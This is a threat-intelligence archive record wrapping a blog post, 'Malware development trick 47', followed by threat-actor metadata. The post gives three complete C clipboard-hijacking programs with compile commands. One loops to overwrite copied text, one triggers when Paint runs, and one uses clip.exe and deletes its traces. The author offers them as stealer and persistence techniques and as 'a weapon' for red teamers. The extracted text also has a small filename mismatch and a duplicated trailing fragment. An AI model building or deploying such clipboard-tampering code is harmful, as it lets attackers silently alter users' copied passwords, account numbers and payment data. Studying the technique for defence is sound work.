{ "id": "3f2f0ef6-a86a-4774-b1f0-02616a532e45", "created_at": "2026-04-06T00:07:11.713939Z", "updated_at": "2026-04-10T03:35:16.621565Z", "deleted_at": null, "sha1_hash": "23e395ca1e3b7ebd8e6c9c2754d75981bccda0b3", "title": "Malware development trick 47: simple Windows clipboard hijacking. Simple C example.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1349722, "plain_text": "Malware development trick 47: simple Windows clipboard\r\nhijacking. Simple C example.\r\nBy cocomelonc\r\nPublished: 2025-05-10 · Archived: 2026-04-05 15:54:48 UTC\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is not just malware development trick. This trick is often used for malware persistence and for stealing\r\ndata in stealers logic.\r\nIn this article, we’ll explore practical clipboard Hijacking techniques and process monitoring on Windows using\r\nC. We’ll break it down into three separate code examples that demonstrate how attackers can manipulate clipboard\r\ndata and monitor specific processes (such as mspaint.exe in my case). Each example highlights a different\r\napproach to achieving persistence and compromising the user’s environment.\r\nLet’s dive right into it.\r\npractical example 1Permalink\r\nThe first example ( hack.c ) demonstrates how we can hijack the clipboard content in a Windows environment\r\nusing C and WinAPI.\r\nhttps://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nPage 1 of 14\n\nwhat we need:\r\nOpenClipboard - the function opens the clipboard for access.\r\nIsClipboardFormatAvailable - checks if there is any text in the clipboard.\r\nGetClipboardData - retrieves the clipboard data.\r\nstrcpy - for replaces the clipboard text with “Meow-meow!!”\r\nSetClipboardData - updates the clipboard with the new data.\r\nGlobalLock/GlobalUnlock - locks and unlocks the data for safe manipulation.\r\nSo, full source code for first example looks like this:\r\n/*\r\n * hack.c\r\n * simple clipboard hijacking\r\n * author @cocomelonc\r\n * https://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\n */\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\nvoid hijackClipboard() {\r\n if (OpenClipboard(NULL)) {\r\n // check if there is text data in the buf\r\n if (IsClipboardFormatAvailable(CF_TEXT)) {\r\n HANDLE hData = GetClipboardData(CF_TEXT); // get\r\n if (hData != NULL) {\r\n // lock access to the buffer data\r\n char *data = (char *)GlobalLock(hData);\r\n if (data != NULL) {\r\n // replace with \"Meow-meow!!\"\r\n strcpy(data, \"Meow-meow!!\");\r\n EmptyClipboard();\r\n SetClipboardData(CF_TEXT, hData);\r\n GlobalUnlock(hData);\r\n }\r\n }\r\n }\r\n CloseClipboard();\r\n }\r\n}\r\nint main() {\r\n while (1) {\r\n // wait until the clipboard is available\r\n hijackClipboard();\r\nhttps://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nPage 2 of 14\n\n// 10 sec pause - to avoid high CPU usage\r\n Sleep(10000);\r\n }\r\n return 0;\r\n}\r\nAs you can see the logic is pretty simple. This PoC continually monitors the clipboard, checking if it contains any\r\ntext data ( CF_TEXT ), and if so, replaces it with the string Meow-meow!! . This type of attack can be used to\r\nsilently manipulate the contents of the clipboard, potentially modifying sensitive data such as passwords, credit\r\ncard numbers, or other critical information.\r\ndemo 1Permalink\r\nLet’s go to see everything in action. Compile hack.c :\r\nx86_64-w64-mingw32-g++ hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-section\r\nThen run it on the victim’s machine ( Windows 10 22H2 x64 on my case):\r\nWhile the program is running, it silently modifies any text that gets copied to the clipboard by replacing it with\r\n“Meow-meow!!”:\r\nhttps://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nPage 3 of 14\n\nPerfect! =^..^=\r\nhttps://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nPage 4 of 14\n\npractical example 2 (monitoring specific process)Permalink\r\nThe second example ( hack2.c ) shows how to monitor specific processes, like mspaint.exe , and perform\r\nactions when the application is launched.\r\nWhat we need for this:\r\nFindWindow - looks for a window titled Untitled - Paint , which appears when mspaint.exe is launched.\r\nisPaintRunning - returns 1 if paint is running (based on window name), otherwise returns 0 .\r\nhijackClipboard() - when Paint is detected, the function hijacks the clipboard content and replaces it with\r\nMeow-meow!! .\r\nSo, full source code for this example is looks like this ( hack2.c ):\r\n/*\r\n * hack2.c\r\n * simple clipboard hijacking\r\n * specific process paint.exe\r\n * author @cocomelonc\r\n * https://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\n */\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\nchar* subStr(char *str, char *substr) {\r\n while (*str) {\r\n char *begin = str;\r\n char *pattern = substr;\r\n while (*str \u0026\u0026 *pattern \u0026\u0026 *str == *pattern) {\r\n str++;\r\n pattern++;\r\n }\r\n if (!*pattern)\r\n return begin;\r\n str = begin + 1;\r\n }\r\n return NULL;\r\n}\r\nvoid hijackClipboard() {\r\n if (OpenClipboard(NULL)) {\r\n // check if there is text data in the buf\r\n if (IsClipboardFormatAvailable(CF_TEXT)) {\r\n HANDLE hData = GetClipboardData(CF_TEXT); // get\r\nhttps://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nPage 5 of 14\n\nif (hData != NULL) {\r\n // lock access to the buffer data\r\n char *data = (char *)GlobalLock(hData);\r\n if (data != NULL) {\r\n // replace with \"Meow-meow!!\"\r\n strcpy(data, \"Meow-meow!!\");\r\n EmptyClipboard();\r\n SetClipboardData(CF_TEXT, hData);\r\n GlobalUnlock(hData);\r\n }\r\n }\r\n }\r\n CloseClipboard();\r\n }\r\n}\r\nint isPaintRunning() {\r\n HWND hwnd = FindWindow(NULL, \"Untitled - Paint\");\r\n return hwnd != NULL; // return 1 if paint is running, else 0\r\n}\r\nint main() {\r\n while (1) {\r\n if (isPaintRunning()) {\r\n printf(\"paint is running! hijacking clipboard...\\n\");\r\n hijackClipboard(); // hijack clipboard when paint is detected\r\n } else {\r\n printf(\"paint is not running.\\n\");\r\n }\r\n Sleep(5000); // check every 5 seconds\r\n }\r\n return 0;\r\n}\r\ndemo 2Permalink\r\nLet’s go to see this example in action. Compile it:\r\nx86_64-w64-mingw32-g++ hack2.c -o hack2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-secti\r\nhttps://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nPage 6 of 14\n\nThen run this program while opening Paint on the victim’s machine ( Windows 10 22H2 x64 on my case):\r\nhttps://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nPage 7 of 14\n\nOnce Paint is launched, the program will hijack the clipboard content and modify it.\r\nhttps://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nPage 8 of 14\n\npractical example 3 (using clip.exe to manipulate clipboard content)Permalink\r\nOne of the popular trick in the wild. The attacker replaces the clipboard content with their own data by redirecting\r\noutput to clip.exe .\r\nclip.exe is a Windows utility that copies the data from a file or input stream to the clipboard. By redirecting the\r\ncontents of a temporary file into clip.exe , the attacker can modify what is placed in the clipboard.\r\nThis method allows an attacker to silently replace any copied data with their own custom data, which could be\r\nsensitive or malicious.\r\nWhat is the main features of this example:\r\nfirst of all we need malicious data - the data to be placed in the clipboard is defined as \"Meow-meow!!\" , which\r\ncould be any arbitrary malicious data that an attacker wants to replace the clipboard contents with\r\nconst char *maliciousData = \"Meow-meow!!\";\r\nthen we need temporary file creation - the program creates a temporary file (temp_clip_data.txt) where the\r\nmalicious data will be written. This is necessary because clip.exe works by reading from a file or standard\r\ninput.\r\n// create a temporary file to store the malicious data\r\nFILE *tmpFile = fopen(\"meow_data.txt\", \"w\");\r\nif (tmpFile == NULL) {\r\n printf(\"failed to create temporary file.\\n\");\r\n return;\r\n}\r\n// write the malicious data to the file\r\nfprintf(tmpFile, \"%s\", maliciousData);\r\nfclose(tmpFile);\r\nat the next step we need executing clip.exe - the command clip \u003c meow_data.txt is executed using the\r\nsystem() function. This copies the contents of the temporary file to the clipboard:\r\nchar command[256];\r\nsnprintf(command, sizeof(command), \"clip \u003c temp_clip_data.txt\");\r\n// execute the command\r\nsystem(command);\r\nat the final, after using clip.exe , the temporary file is deleted to avoid leaving any traces.\r\nSo full source code with this logic is simple, like this ( hack3.c ):\r\nhttps://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nPage 9 of 14\n\n/*\r\n * hack3.c\r\n * simple clipboard hijacking\r\n * using clip.exe to manipulate clipboard content\r\n * author @cocomelonc\r\n * https://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\n */\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\n#include \u003cstdlib.h\u003e\r\nvoid hijackClip() {\r\n // prepare the data to be placed in the clipboard\r\n const char *maliciousData = \"Meow-meow!!\"; // the text we want to copy to the clipboard\r\n // create a temporary file to store the malicious data\r\n FILE *tmpFile = fopen(\"meow_data.txt\", \"w\");\r\n if (tmpFile == NULL) {\r\n printf(\"failed to create temporary file.\\n\");\r\n return;\r\n }\r\n // write the malicious data to the file\r\n fprintf(tmpFile, \"%s\", maliciousData);\r\n fclose(tmpFile);\r\n // use `clip.exe` to copy the content of the temporary file to the clipboard\r\n char command[256];\r\n snprintf(command, sizeof(command), \"clip \u003c meow_data.txt\");\r\n // execute the command\r\n system(command);\r\n // clean up: delete the temporary file\r\n remove(\"meow_data.txt\");\r\n printf(\"clipboard hijacked! data copied to clipboard: %s\\n\", maliciousData);\r\n}\r\nint main() {\r\n printf(\"starting clipboard hijack using clip.exe...\\n\");\r\n // hijack the clipboard with malicious data\r\n hijackClip();\r\nhttps://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nPage 10 of 14\n\nreturn 0;\r\n}\r\nThis PoC will allow an attacker to inject custom data into the clipboard, for example, when a user copies sensitive\r\ninformation, the attacker replaces it with malicious content.\r\ndemo 3Permalink\r\nLet’s go to see this in action. Compile this example:\r\nx86_64-w64-mingw32-g++ hack3.c -o hack3.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-secti\r\nThen run this program on the victim’s machine ( Windows 10 22H2 x64 on my case):\r\nhttps://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nPage 11 of 14\n\nhttps://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nPage 12 of 14\n\nThis PoC could be used for transmitted data manipulation, where the attacker injects arbitrary or malicious data\r\ninto the clipboard while the user is copying critical information (e.g., passwords, bank account details, etc.).\r\nIt’s important to note that in a real-world attack, an adversary could use other methods to automate and conceal\r\nthis process, such as setting up persistent tasks or injecting malicious code into other applications that rely on\r\nclipboard data.\r\nBut there are the caveat in these PoCs. If the clipboard contains text that is shorter than the malicious data, using\r\nhijacking in this way could result in partial replacement. For example, if the clipboard already has “Quack” and\r\nyou try to replace it with “Meow-meow!!”, only “Meow-“ might get copied, because the buffer is smaller than the\r\nnew data.\r\nconclusionPermalink\r\nThese simple examples demonstrate basic techniques for clipboard hijacking and process monitoring using C and\r\nWinAPI. While they serve educational purposes, they also highlight the dangers of malicious software that can\r\nsilently monitor and manipulate system resources. By monitoring specific processes like mspaint.exe (of course\r\nin real cases something like firefox.exe , msedge.exe ), attackers can deploy undetected actions to alter critical\r\ndata, such as clipboard contents.\r\nBy understanding these techniques, security professionals can better defend against these types of attacks. Stay\r\nvigilant and ensure that all systems are properly secured and monitored.\r\nSeveral APT groups and cybercriminal organizations like APT37, APT38, Sandworm and malware like\r\nZeusPanda, ROKRAT or CosmicDuke have employed this trick.\r\nhttps://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nPage 13 of 14\n\nI hope this post is useful for malware researchers, C/C++ programmers, spreads awareness to the blue teamers of\r\nthis interesting classic keylogging technique, and adds a weapon to the red teamers arsenal.\r\nMITRE ATT\u0026CK Techniques: Clipboard Data\r\nAPT37\r\nAPT38\r\nSandworm ZeusPanda\r\nROKRAT\r\nCosmicDuke\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nhttps://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html\r\nPage 14 of 14\n\ndemo 2Permalink Let’s go to see this example in action. Compile it: \nx86_64-w64-mingw32-g++ hack2.c -o hack2.exe-I/usr/share/mingw-w64/include/ -s-ffunction-sections -fdata-secti\n Page 6 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cocomelonc.github.io/malware/2025/05/10/malware-tricks-47.html" ], "report_names": [ "malware-tricks-47.html" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d", "created_at": "2022-10-25T16:07:24.139848Z", "updated_at": "2026-04-10T02:00:04.878798Z", "deleted_at": null, "main_name": "Safe", "aliases": [], "source_name": "ETDA:Safe", "tools": [ "DebugView", "LZ77", "OpenDoc", "SafeDisk", "TypeConfig", "UPXShell", "UsbDoc", "UsbExe" ], "source_id": "ETDA", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0", "created_at": "2022-10-25T15:50:23.240383Z", "updated_at": "2026-04-10T02:00:05.299433Z", "deleted_at": null, "main_name": "APT38", "aliases": [ "APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM" ], "source_name": "MITRE:APT38", "tools": [ "ECCENTRICBANDWAGON", "HOPLIGHT", "Mimikatz", "KillDisk", "DarkComet" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434031, "ts_updated_at": 1775792116, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/23e395ca1e3b7ebd8e6c9c2754d75981bccda0b3.pdf", "text": "https://archive.orkl.eu/23e395ca1e3b7ebd8e6c9c2754d75981bccda0b3.txt", "img": "https://archive.orkl.eu/23e395ca1e3b7ebd8e6c9c2754d75981bccda0b3.jpg" } }